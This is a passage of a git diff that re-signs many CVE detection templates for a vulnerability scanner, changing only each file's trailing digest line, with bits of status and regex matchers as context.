4a0a00473045022009e1336c07159cabec79e8844cb640fd0418148c663d7baff3c66fb4c42fb932022100d38e8e26133949b2eed8a2ff488f1da484e5b7ac9cbbd3087de0c15d1d2f328b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206c0c62d51645d47dcc4ba554b8ce5e20449b797d54aa482be5a3611ff941da890221008c2283c5200054ad117f72fe2a268b80d52798dd6426ec016ac444649f5bd6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index fd4935890c..f795647191 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -85,5 +85,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body - -# digest: 4a0a0047304502201f8fa3f6a1cbc6a385de1e676d92bc41f84296259cda0b1ea5c5a84399573cb4022100e8893f86fefb2db542d2a1bebc041873d06c4712c57ce42705239fbae75c5247:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022051d1e32e9a26c98797b5e4ddd9eff2aae95b1d1d9ad4ccce75ff38d39d4a90dd022100a4cef7da4539a6ac889e90a4b2821a94ae61bd147f594e30703f14df7cfef021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 26bff62652..7c42c26cf2 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -62,5 +62,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body - -# digest: 4a0a00473045022100f97af71751a42817714db7fb9cd412ae71b5d1d90760a3dd367aab9720d7be5c02202344ff9a8e9a4ba33349fda23e398d3d27722c49c569b733b03ae3706d7ab912:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022074db2f1576e6eb0be660b2a1882473c7e212c9c4d7497e380bf550afc5163673022100c382cd8f963187618290d8f4fef97b8bc0b41ee974497796e07428046b90aae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 77f9481e97..a11753a412 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -92,5 +92,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022053023522b1eb92790fbc2f28a80e4395b9776c113c265c444d105ca96352fbd4022057dc5956a6c346e620927f01b45cc61af5694365a7a838afef47882caf4bcae2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210091b3bb891fd57b4f6a7259816e814bc85df39b53f8e770d65862012ff2786c39022100843ccb71e4573e31a2069eead8144ed45bbe64ed2eff55a440d8496347e6d2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 54c4d83873..5d375bf0d7 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and - -# digest: 490a0046304402200b80d8844469d5812ad128a6bdc9031a9a89ee1e4843a6295a62e8210085edae022043ee41faed64b7981862c605d1b72ae00ffce7be0d218cafabb19e4b3f924936:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d0ad55ff1abefd9f848fa2118efbff9f0b3c7d2e8e541a0c66abd852541f9989022100fc3039dc3cf9e0479d309ca5c3e1c92125aacdf5eb354eec1d35a36e2aac1a8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 6bcf994285..f91a7b1bbb 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fdd633241ec5ab02a95929590937c121c22880ce7149d8983c8e963c1cfd9d71022100b652b2fd404db6c8a9b31c509ac58f7e1c422fe1c0d2129ca65bbdcf3cea3669:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220214d79c1e24871f3a297c98f5084e8aab72e5db769699d8a175b154f7a3348f3022100942fb37c5a0286c7de128164e64d216a0b793d45560a6a2b232d2b0fbc0a1bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index b600b94ab2..8db85b4b21 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022058d530a19b10d12290ad8ec08d9fadbc771b86bb40240008dd95481f945baf7202210093548de605c20cfe09d2b52266cbdfe56059eab85da533c2ccd569865a870d0f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201c3e5aa024dbc4acfa7a5540a539c5a27c595c4d760a3fc258b0730845267245022061c6f80a9a8ea2fddb49adc2cead02cc3caef5cf86ce3ec706955b10b4386ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index ff6a972dbd..08bd7fa337 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -67,5 +67,4 @@ http: part: header words: - "OFBiz.Visitor=" - -# digest: 4a0a004730450220664f652da5133e2a5f8ee1ce3b262271a29886aa7e84eedc03909e64ee1c39e8022100d895036e2625de7ea882d0492f600c0ef1a32e5de64b4515f858636e56e72508:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202d5bf47102d522c6d9868b0361d72fee1f1431a1cad03342d6d762a72627052802201d4aebc190b7202ecbe0da8a2376a4d389af78b723ace9027eba93313d4ef935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index f9761e9c73..183e0b3a04 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ebf1b8191a117d5fd741d6ca1804c910be2dc0bc1d5f7cb42bc66ee23e1c8cbc0221009a42b0b07574592cad6c444d2dbadce5e29c98ad80e39626a8838819cb5eabdc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008547fcb818fa3a2a28f06218a2820ae023afd88d30ddbb2c9ca74b75049e1f7802203cbe9e8af1e8fc71bdf27eb4eb715c301c892a6f14cd9c8a849b782a3c456c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index a45bcbfa2d..fd787ad22f 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -63,5 +63,4 @@ http: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' internal: true - -# digest: 4a0a00473045022100beff774b627389a27d8f093d863e118219029b384709a85f7340d56e5fa128180220009e0976175405ef0661fc519a8cf8f971a8f3e6fc32854d22e6ce068b1a8bbd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207a17792ebd2d73ed3f4f3079afdbbb94671293792d96bbe1086747da62c2affd022055cdf54aa574190f049c92dd966132885979d22eccda62a78cfc45911b6dac18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index ac924383a7..2385d5fc86 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220737be107f76746dc3083fc357c383994c582c1c916cbe1898521d6382fd5e7280221008cbb7781ff0b41b6a7f3912e5a64bffca952e36faa2f1ebd24afdeb570ad2652:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022076ced1010198c9e3f54938bb1d7cf4ebcda5582f80bd4a776e09867102c9ac9b02201196e94e8ae4722c99a21b659d57f6f92b2c961067b90200fcaf9b38cb3b7d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index c21ced4391..c7a407815a 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f17da5484769f0687911f5905e276fd3a0e24626fb2092f824ddff0132fee278022100fc9d9a41990e5626afb26ec00a238699d92ddb8598f3f9773959733720396ddb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a19392dc2f384131ce69df267eda9f7c9622fd196103f6d3b5e5fe112d7a4b6102207c0597acb2e5951093c633d6b325d65057f771facc5619cbd6dd2183b6d32b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 29fcbe6115..7fa18811d7 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d0a1db7c749b4619eadcb3a9526276dd57b21fde5904620dca9991e51c10bbf502206b4503e24d9a0ae618978f8d53134374e62249ee6ec096d2b4254be48b7f8123:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100be3f9d5b6fc068d11995baead01da73930da12c2b27a929f2d6b8c0befac42de022042eb397920b16d3e4c17b2f008fa818de9b78354322b9820ecfc19f288b65f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index ab3ba02b65..edeacbf1b2 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206a2e71d8583340a74d61d827eb10b5b5d7eb64c585aaaeac0c1e63bdf8805336022100d761739405af053b99ad16d88bf830e61ad3278a42d7fd113e4ddd32ce5257bd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206317f92ae87b1e968ab391d06b6261a4cc9129d60a457fc1098cb149408ea9cc02204432a111088855f089cca9599e0bbc8fb3e78ed7f1339716422d3a6a1f259d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index f8d0d8c273..e2704f7e59 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -39,5 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4b0a00483046022100b38b39cef84ddf66fe92ef350ceb7b5d1b69cf1c64f542854a74ee2c4dc1b1c6022100dc5952e4bc3368b5eff5515397eb9d9c444cdac733cd6b4a730c4cbf8186496a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204a0cc46be57d558c1c0b7f6f60b414bb00328038a2a21580465e1f6e2a66672f02210090971d458400756a986f6518ec7b2c15fbd97670863e61f0750976b68c204417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 87d6af1655..26680486ef 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220101f4365fe6bc7ea15026e6e7825fb8e97573b4760c74165e1d92875db5e93d0022100e2f1aea334b8b698b363eda8217e323053b9504daa6594f4f0299996d8080a6d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009b7c695b8379c2e13a042b503430873e0a50cd860586b9242517266fcbb9bbc602206f4af04fcd61e61a144d7663dd8680a23050f64e887bbb003e25d8de3a0eb28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 5ef305c439..3088235eb8 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -45,5 +45,4 @@ http: part: header status: - 404 - -# digest: 4a0a0047304502202c2d00f79afdb9b33d215fa8f8e22464c462d15b0dfc59abb7c7b74077e4fb0a022100a443f3a1fe95299e9e5174164d15bb3b93e4d665cc45cc3f804bbbbea5024950:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210085365493d1a7b97a91acc26440e72887e6e80289321f22fb04ba0170b384ccf302202efd276d7a8844effa0b84036b8c2ee59ced6d761a175e56ab6e72484a8e0b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index ff089b38f1..d25619a50f 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e87cb1766cc99b72e64be3dbb5377084f37861e586b14e4f861d8a4671ea5106022100b330ed6a1dfa8835d9f0b0b29e21aefb9f8c04ea37f36b47beb092a00f54c3aa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097edb5168bd506f6212506940f4d6024461ebbb49c7dfd059687b71804f5408b02206c9e46336e8bcdbf996edb70dc009794ae2f9df56af2d59d6b33a5f502458df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 276b3aa8e9..6b3a440ce4 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210095451a079d882c79a09c6a87811627677531d1cdef73afab54aedfda98f0a83a022100a39f7455976f3d15cc5754ed0a1735995d4eae932ba44fc834104657056b96af:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b1ab09db1adc3b9c55beade91e6c1bc2ca099aa65874d3a65442619f04a8e7d00221009799db066b7eb14f661d168e0942cb620c68fa3fb0fdfd24337379749b1ec1f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 2f4f7ec49d..ccb73b2a42 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "Doctor Appoinment System")' condition: and - -# digest: 490a004630440220707e8be285301ff83f3bb1bbb2103e291e7bcdcd2c0df67d3c5632127d8c988b02206fbc9dad0432f8662ceb25267dddfb8fa528987d28fdd2345d686f20711b1e99:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e89a75f809bfea9e40f8190850bc0830b10837db5884ef79e70ddd661fa476fd022100d90b5173adfaa426e81e8f7be17f73c5c59160539f0d3e731cfb050d7cc39782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index e1b9b67718..285ed05881 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a00473045022018f9edf6838cd0f5becc2dc01fc5d5728052ac44ce6fde28b8084f7990941d60022100923bc0beee27b799ce81456c9a788bc64687f3a6cb65a50d7dc0361620def45c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e60ccc28ecf1631ae6348ba157b6deb1269a5e07506b09e64c5342dd53ed425022100f44457ecb049096614e85305e96f643f634433e8586cc43954b27c9a44f984d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 9b578586d2..491d962999 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 490a004630440220501ba9bb21d6b99c736bf865ae5f586bb34585cf9d6876c5e7645ffb0517ceb10220453c38b5561fe3e9218511af5b57aecdcf382850acc0c96ad29f66c8241ca057:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200b4df97bd77ca21795a4cec6073586a1b92b973f61d20e445c973cc222532f5402203769f869375a55a9b24a98cd3306a0f6c7c60447d54beea0ba872ce0cd27ea42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 424ba072f7..2923816874 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a0047304502202fdd89cdc0005835f075bc0f43e56599ac2ec0e3f4c72fc8ee584ce1867edfe5022100df72e7ebe57b85883fd50d0ccc1ebf220c3c318d5787587400ad6fba5dfa0275:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bb4b50cfcab09d920b3ff581ab1d2fb567c77d8b832d2755d1edbfd16554ee3c022100b1fa60f9b3d9c1f07fbae30792906bf3edf6f87acd56d2eebd1d5c174a58fcec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 2b1aad74a2..9589efb0ed 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -44,5 +44,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a004730450220444b63ffb2a5091e449798620a873fff3a0bea524c34993e3bfdcf5aae509d88022100d7371205ae98834750631ca5ee38e5f9b7dbacb3ca478be26767c0b91032171a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e0ad47818cc3684eba8b3b5b51861bee344cf70c892a398763d4dd10f29adedc022056f5a991f51af87a37bde89398981fcad95fc9acf784374bdaac2ddc1491df7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 6a5e5d9085..a2f76b2cba 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100eaa6b480f686205731b7d721022f206549c0e21003319fdf0cdd0e7c159a5e7402206e67f14dfa19572668388c0a28d117fa6a66d58999b7deabca73efcfe41eb929:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f78e669d836b3470114d63f5fc82e00d54e9eb175c2e7408da9df6cbdc40f7b402207c2fd73746984ff6b739e8a10f95ca0e48128b6e7857cb976f2f7027bbfd37f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 8180753686..30e61fa4b6 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -50,5 +50,4 @@ http: part: header words: - "application/json" - -# digest: 490a0046304402201b30d5e7d08366dc57731e6eedfc871dc125a66f54fe03b89f6e10c57d4a6f7402203a1aafc1fdc1774c1633fe07fb1c6c282e4407b91a46a9312655a4f21d12e02d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201ce4b14aec1bd2f0474c9749273218d3bedc6e0c915506e80c1bf868b6ab4192022100bc377ddbea10da7f3357d4c471f52d430200fd9e9d2cd5d20af8cdd911fa5019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 04eba94cc2..600c2c0c67 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b7d7eac1749f29ad784c0401ad9ff80c69be90f9ba12ce7db4d0171310021cab022100e2c4e36b208512e97fd9e0a3b84873be0626b48c65b5cef656456e387a9c5c7b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046ae61435a7ceb51fa7c76d615353d8255e3551571e43b11f2973358811b7438022100a84929343c3f0ac322325544dec531de748d58e6681088a57075b1f93925b9fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index b4c336a8a0..00e29cbf3e 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207112f261fcee69c01bef7567c6494cf0e1877696a5b1cf639ba64e4c7e6bca3a022100d41878582b786e4b0adaae22991abb0a1522691e9e72791feb8c7e16d8625897:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c98b5470eb93acd3189d5aaffb3f03fc9de41cdfb5c587824652aca18d10ade022100ccd4a84fe397ac39a595ef25dc8aa319ab6d7ec586471a3fed3d60dda6447411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 6d395689be..60cf78128a 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -61,5 +61,4 @@ http: group: 1 regex: - '(?m)Pega ([0-9.]+)' - -# digest: 490a004630440220263e18d1645cda9e0befd5b47310f6f3218854d7ea7a6a5e8bd1c5e589751b2a022053c545698a96e637b4fd28e7c0d638a9d936d571855ef5070fdc6cbe3f2bba18:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220487245e4470bf84357aa00023205ce24168dd505615f4419c86d5c4e86a75a09022100d97f16c75163e688ecde786a956e8335c8495b0101865ea81ba7bd38402a0a39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 78fa160adf..178c8275aa 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201c29805484c2c1757ec31616697d8906f88d56472a11d3543fd8822e9a17a98c022100e12aa5b639ce1552a4f04260f093b73fa966f5dd75919ed6dd09c0ec04f7acc6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022014f7bfa1e08e0f8d2d3094f619168631371bf188471e6f5b667e4a669b301f32022100a4f5490c05da860e32e73180d470e943abfeb417071d273d9a184a3715ec3652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index 68c82eaf3e..dad166e0b7 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -64,5 +64,4 @@ http: - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' internal: true part: header - -# digest: 4a0a00473045022100ae5e72d0c7c9a8ee38995dd5706041a751b56d8fcb768981454b5b033b39a0a00220375d95d0155ea064261a32dbfb8bf9b9eb2a92f6957b00aa1e881cd4b1634d7a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022061be722553c5d1a6b92aa087685dfd51a9163181d55c77082e16d9577f3a6cd9022100caf5811d3cfa91d976c60160aa17645e9484b15aac69714e4fe853c83c377ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index c8fbdd7ffd..90b467a733 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206f8c2c59b7f441e610164b6e5696c5908169e6254bd6a480b3c649d04185ae200220375a258e926a5efdd5bbbe8c27f3cd75e2d6351ed099fb6f29c7e5c12374ea9e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f26a581ddea09f0cc5fd43d6363cedf8019e1b3a45fbb20728594c8b28d0a2d802205db1f4e1d5bf248c5f83fb3aada8d12b7a48abe35375211b346f6e6854cad965:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index bbb5c048f2..24fee64e25 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -44,5 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a0047304502203c8908d80e55232df6547f26d5f91f6ffe29afebca08a26486c88ea4074a75f1022100f656c4583b6fd9dd582662375f49f350d57813e8e690a9470422073ea47f312a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205e970f141fc10b587b4755817fbe1e0ebd158f398dfaab9ea4ffde44ecc48727022100fc6a7869f4821c502e510080e93de6eb6d176f51a7abaa6a0dd13aad4276bf12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index f3d8f1b837..63e36a4b74 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220593cc3296afa245fd951377ec1bd21a94b94bd4548e961b1e8b32ce9299a35ab022100fb273fb15d9a66b129098202903cc7ae763cccaeb806c9ea146e700ad3d386bb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c5c279f9a54b43f21272db3b1650806ad3af36057d3e49043b8012bd0a702bd0022100fa6754dec8a5976a41512bafa0f9191aa86e82c1b510613aebb647ce460bc729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index b98cdc5969..0925962949 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f5d29c8566cc656971cd02c64e4d1f45d9307dda1e8feb58a23c44193d25d7ed0220491e210500f12428bee7ce3ce18da911196e83928bb5a14fccb0164c65e1dcab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009c3d0526816e107bc9c110103ecab9abd79654c36e6e960d908cfb8745b35ac80220662b770d5e757c98eb6d6d4fe1fcc4459ce06dc63c0176a32cce2176d0285dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index c0ed3e641c..a22045d954 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100950159ff65cddb406c7b85b85275ecdacb681d3d954b7a13f428cf6d5683da370220194196bbe44f12fab35bc9b9312016fa192ae0a184b10334a2eeee3005896b55:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d3c9ef747f6e0962a20ba37851bf6280a9d36f05d73900023f31c457b049ac5022100aaf824921f93e8bcb45ec525104c107c41507bb2010f1769e6256d44944615b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index db0a9161a2..4c1a336329 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b2df4e140ac20cf8aad7269c63718c3991afa11558bcd5696d08fcebd236ae1e022100c8e6312a80ce5527a474e389c75d091eee7ede406e0ee6dcc4a0b4f77b7edfed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022023b49b442a21c4af4d3189f9c1ea21ec356401ebc3ba070a20c18a65559500a8022100c69d3beb4e9f5d51b9f52934f52fb2a3e301a491f28590c2fd264c69da888d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 322bb2d20b..6772c34732 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# 